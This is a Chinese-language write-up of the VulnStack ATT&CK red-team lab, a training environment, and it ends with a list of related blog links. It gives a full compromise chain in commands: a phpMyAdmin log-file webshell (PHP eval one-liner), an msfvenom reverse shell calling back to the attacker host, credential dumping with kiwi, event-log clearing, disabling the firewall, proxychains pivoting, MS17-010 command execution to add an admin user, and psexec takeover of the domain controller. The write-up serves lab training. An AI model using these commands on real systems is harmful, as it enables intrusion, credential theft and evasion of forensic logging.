靶机信息

靶机基本描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,完全模拟ATT&CK攻击链路进行搭建

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

虚拟机初始密码:hongrisec@2019(开机后会提示更新密码)

server 2008:hongrisec@2022

win7:hongrisec@2019!

win2003:hongrisec@2019

环境搭建

由于该靶机环境搭建比较复杂,这里多写一些,记录一些搭建中遇到的问题

靶机文件

下载好靶机环境后,解压完有三个文件夹

分别打开三个文件夹中的.vmx文件,运行后会自动打开虚拟机

打开后新增三个虚拟机 win server 2008、win7、win2003

网络配置

根据官网给出的网络配置图片来看

kali和win7同属于VM1网段(win7需新加网卡设置为VM1)

win7又与2008和2003属VM2网段

问题1:扫描不到win7主机端口

使用nmap扫描时,扫描不到该win7主机的开放端口

因为win7新加VM1网卡,网卡的基本信息没有配置

配置一下网关这些信息,一般网关地址为.1或.2,可以用物理机ping测试下到哪个地址能通,来确定网关

配置如下,配置正确后网卡状态不再显示为未识别的网络,nmap可以正常扫描到端口

问题2:扫描不到win7主机80端口

解决第1个问题后,发现只能扫到5357端口

需要在c盘下找到phpstudy,并运行即可,如果运行后还是扫不到的话,参考下面的方法

和kali同网段的VM1网络的防火墙关闭,域网络的防火墙保持开放状态,正常来说不应该关闭防火墙的,这里用了各种扫描方法都扫不到,arp扫描,禁ping扫描…,如果实在没办法再关防火墙

攻击路径

官网提供的攻击路径如下:

攻击者:kali

web服务器:Win7

域成员:Win2003

域控:Server 2008

信息搜集

kali与win7同属VM1网络

使用nmap扫描VM1网段存活主机

nmap -sn 192.168.41.0/24


发现.128主机,猜测为win7主机,对该主机进行扫描,发现扫描不到开放端口

ps1:如果扫描不到端口,参考目录的环境搭建->网络配置->问题1

nmap -A 192.168.41.128


发现只开放了5357端口,没有发现80端口,需要在win7上手动开启phpstudy

ps2:扫描不到80端口,参考目录的环境搭建->网络配置->问题2

解决以上两个问题后,扫描到的内容就比较正常了

通过kali访问win7站点,发现为phpstudy探针

通过网页下方的mysql连接测试,发现使用默认密码(root/root)可以登录数据库

漏洞利用

访问数据库phpmyadmin地址进行登录,http://192.168.41.128/phpmyadmin

登录到phpmyadmin后,通过开启日志记录写入shell

在变量处,搜索general的值,修改为ON开启日志记录

开启日志记录,设置日志的存储路径,放在www目录下

然后在SQL处执行sql语句,执行语句会被记录到日志文件中

SELECT "<?php @eval($_POST[666]);?>";

使用蚁剑连接shell,登录到蚁剑,在www目录下发现一个yxcms的目录,也是一个站点

已经通过phpmyadmin拿到权限了就不搞这个yxcms了

弹个shell到msf上,方便后面操作
用msf生成一个exe程序,回连地址为kali

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.41.129  LPORT=666 -f exe -o shell.exe

在kali上打开msf配置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.41.129
set LPORT 666
run

通过蚁剑上传exe文件,在虚拟终端里运行,msf上线

权限提升

首先查看下当前用户,提权到system权限

getuid
getsystem

然后迁移进程,找到一个64位且权限为SYSTEM的进程进行迁移

我这里是用的services.exe,pid为488

migrate 488   //迁移进程到pid为488的进程

加载kiwi模块,抓取用户密码

获取到账户的明文密码,administrator/hongrisec@2019!

load kiwi    //加载kiwi模块,功能与mimikatz类似
creds_all   //列举明文密码

ps:加载mimikatz模块来抓取密码的话,获取不到密码,msf上也提示已经被kiwi取代

清除事件日志

clearev

关闭防火墙,打开3389端口

netsh advfirewall set allprofiles state off    //关闭防火墙
netsh advfirewall show allprofiles state    //查看当前防火墙状态
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f    //开放3389端口

kali通过rdesktop开启远程桌面

redesktop 192.168.41.128:3389

内网搜集

ipconfig /all 查看网络配置信息

发现有两个不同网段的网卡信息,和DNS域名信息

net config workstation 查看当前登录域和用户

net time /domain 判断主域

net view 查看域内主机,发现域内有3台主机

net user /domain 查看当前域所有用户

net group "domain controllers" /domain 查看域控,为owa$

通过ping来判断其他域内其他2台主机的ip地址

ping ROOT-TVI862UBEH.god.org
ping OWA.god.org

横向移动

使用msf无法扫描别的网段的主机,需要设置proxychains代理

先退出msf的shell界面,设置.52网段的路由

run autoroute -s 192.168.52.0/24

设置代理,需要用socks4a模块,找了许久没有找到这个模块

发现是由于新版本kali应该是对socks模块进行了整合,现在变成socks_proxy

查看需要配置的参数,设置上本地的ip地址

use 0    //socks_proxy选项前面的编号
show options
set SRVHOST 127.0.0.1
run

配置完成后,run运行,然后修改下代理的配置文件

vim /etc/proxychains4.conf
socks4 127.0.0.1 1080

通过代理使用nmap扫描对目标主机进行扫描

由于socks代理是tcp连接,这里nmap命令只能用tcp相关的,扫描速度较慢

nmap -Pn -sT 192.168.52.138    // -Pn非ping扫描,-sT tcp连接扫描

最后扫描失败,好像代理配置有问题

排查许久,发现需要将proxychains配置文件里的dynamic_chain注释掉即可

挂上代理使用nmap扫描,之前的问题解决了,但是扫描的速度很慢

这里也可以使用msf的端口扫描模块

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.52.138
run

分别对之前的两台主机进行端口扫描,都开放了445端口

先对.141主机进行ms17-010漏洞扫描

msf先搜索下ms17-010的模块,选用smb_ms17_010

background
search ms17-010
use 3
set RHOSTS 192.168.52.141

漏洞存在,然后进一步利用

试了几个攻击都利用失败,只能通过命令执行的来利用ms17_010_command

set COMMAND net user test hongrisec@2022 /add
set RHOSTS 192.168.52.141

运行后,命令执行成功,将test用户添加到管理组

set COMMAND net localgroup administrators test /add
run

查看下是否添加成功

set COMMAND net localgroup administrators
run

通过之前的端口信息发现主机未开放3389端口,再把3389端口打开

注册表这里不加引号的话可能会执行失败

set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

使用代理远程到.141主机

proxychains rdesktop 192.168.52.141:3389

接下来是域控主机.138,同样是开放445端口,通过smb/psexec模块来利用

use exploit/windows/smb/psexec

然后配置下信息

smb账号密码域信息win7主机的,之前抓到过账号密码

payload处ip端口设置为win7主机52网段的地址

LPORT端口需要为开放状态,可以通过之前的扫描信息来设置

set RHOSTS 192.168.52.138    //域控主机ip
set SMBDomain god    //域
set SMBPass hongrisec@2019!    //win7主机密码
set SMBUser Administrator    //win7主机用户名
set LHOST 192.168.52.143    //win7主机52段ip,做为跳板机
set LPORT 464    //监听端口

运行后获取到域控主机.138的权限,有乱码的话输入chcp 65001,最后clearev清理下事件日志

红日ATTCK实战系列(一)相关推荐

  1. [VulnStack] ATTCK实战系列—红队实战(二)

    文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...

  2. ATTCK实战系列——红队实战(五)

    ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...

  3. ATTCK实战系列——红队实战(一)

    文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...

  4. ATTCK实战系列——红队实战(—)

    ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...

  5. 记ATTCK实战系列——红队实战(三)红日靶场

    以下操作均在测试环境进行,遵章守法 靶场镜像地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 20G左右,分为5个虚拟机,下载之后分别解压,导进 ...

  6. ATTCK实战系列(二)

    vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情 拓扑结构大体如下: 环境搭建 Kali ip:192.168.111.135 Web Ip1:192.168.111.80 ...

  7. ATTCK实战系列—红队实战-4

    0.靶场介绍 靶场下载.配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞. 1.信息收 ...

  8. ATTCK实战系列(三)

    靶机下载地址 漏洞详情 目标:域控中存在一份重要文件. 本次环境为黑盒测试,不提供虚拟机账号密码 环境配置 攻击机kali: 192.168.1.109 web-centos:192.168.1.11 ...

  9. ATTCK实战系列 (一)

    靶场下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻击机:kali:172.26.16.122 255.255.254.0 win ...

最新文章

  1. JavaScript 里,$ 代表什么?/JQuery是什么语言?/html中用link标签引入css时的中 rel=stylesheet属性?/EL表达式是什么?...
  2. php返回mysql错误语句_[已解决]php查询mysql返回了错误的结果
  3. webpack vue-cli 一有空格和分号就报错
  4. Python实现双向链表
  5. css 垂直居中_CSS 水平+垂直居中的方式
  6. python合法的字符串_Python判断字符串是否为合法标示符操作
  7. 从XML文件制作VOC数据集ImageSets下的txt文件
  8. Linux之yum安装MySQL
  9. 【图像分割】基于粒子群算法实现图像聚类分割附matlab代码
  10. vue 按钮控制鼠标滚轮放大缩小
  11. 达芬奇密码--buuctf密码学
  12. 【刷题-每天一算法】赛马
  13. Angular:升级Angular 13到Angular 14
  14. 解决Windows更新失败(0x8007000d)的详细方法
  15. DateTrack功能介绍-如何删除终止日期?
  16. 服务器开机后,自动启动某程序,并且打开Google浏览器,全屏展示
  17. 韵达快递单号可以批量查询吗
  18. 安卓手机查看充放电电压、电流及功率
  19. pcb只开窗不镀锡_关于pads中 PCB铺铜开窗镀锡 的操作
  20. oracle mapviewer 11g安装使用,Oracle MapViewer11g安装与部署

热门文章

  1. arm汇编指令详细整理及实例详解
  2. 双系统重装Ubuntu
  3. 【移动机器人技术】move_base中障碍物无法清除的解决办法
  4. GIS文件 | EXCEL中打开ShapeFile等GIS文件
  5. 玩转Android10源码开发定制(二)之基于Pixel 3手机超级详细演示recovery刷机
  6. mega-nerf安装流程
  7. java计算机毕业设计基于ssm的汽车租赁出租系统(源代码+数据库+Lw文档)
  8. python pygame小游戏_第一个python+pygame小游戏
  9. 柳下挥、六道、鱼人二代入围第四届橙瓜网络文学奖十佳都市大神
  10. 人见人“吐”的十大经典广告(绝对超经典)[zzzz]